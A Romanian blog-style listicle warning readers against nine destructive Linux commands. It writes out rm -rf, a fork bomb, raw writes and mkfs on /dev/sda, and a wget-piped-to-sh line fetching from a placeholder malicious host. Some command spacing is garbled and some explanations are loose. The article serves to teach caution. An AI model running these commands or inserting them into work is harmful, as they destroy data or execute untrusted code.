9 comenzi pe care nu trebuie sa le folosesti in Linux
Cele mai multe comenzi Linux sunt utile în general, dar ele nu fac obiectul articolului de astăzi. Aici, vom enumera un total de 9 comenzi Linux care pot face ravagii la orice computer pe care îl utilizați și pe cu le puteți face o mulțime de probleme.
1. rm -rf
Această comandă șterge tot, fișierele aflate pe Hard, dar și cele de pe dispozitivele conetate.
2.: () {: |: &} ;:
Este cunoscută și sub denumirea de Fork Bomb de către cunoscători.Este un atac de tip denial-of-service împotriva unui sistem Linux, acesta repetandu-se într-o buclă nesfârșită, până când resursele mașinii cedează.
3. command> / dev / sda
Această comandă Linux scrie date brute și toate fișierele din bloc vor fi înlocuite cu datele brute, având ca rezultat pierderea totală a datelor în acel bloc.
4. mv directory / dev / null
Această comandă trimite toate fișierele personale într-o gaură neagră, care înseamnă că ele vor fi pierdute pentru totdeauna.
5. wget http: // malicious_source -O | sh
Linia de mai sus descarcă un script de pe web și îl trimite către sh, care execută conținutul script-ul. Este periculos să executați script-uri nu sunt de încredere, așa că evitați acest lucru cu orice preț.
6. Mkfs.ext3 / dev / sda
Acest lucru vă va lasa unitatea hard disk fără niciun fel de date recuperabile, lăsând astfel sistemul dvs. într-un stadiu de nerecuperat.
7. > File
Această comandă este utilizată pentru a elibera conținutul fișierului. În cazul în care comanda de mai sus este executată cu o eroare de tastare "> xt.conf", se va scrie fișierul de configurare al oricărui alt sistem sau fișier de configurare.
8. ^foo^bar
Nu la fel de dăunătoare ca și restul dintre ei, dar această comandă este folosită pentru a edita comanda rulată anterioar fără a fi nevoie de introducerea din nou a întregii comenzi. În situația greșită, ea poate deveni extrem de dăunătoare, dacă nu verificați temeinic schimbarea comenzii inițiale folosind comanda ^foo^bare.
9. Decompression Bomb
Când vi se solicită să deschideți un fișier comprimat, conținutul fișierului conține date foarte comprimate. Odată ce fișierul este decomprimat, sute de GB de date sunt extrase și care se pot umple hard disk-ul pentru a reduce performanța sistemului dvs.
Acum că sunteți familiarizați cu cele mai noi comenzi Linux, veți face foarte bine pentru a le evita.
Comentarii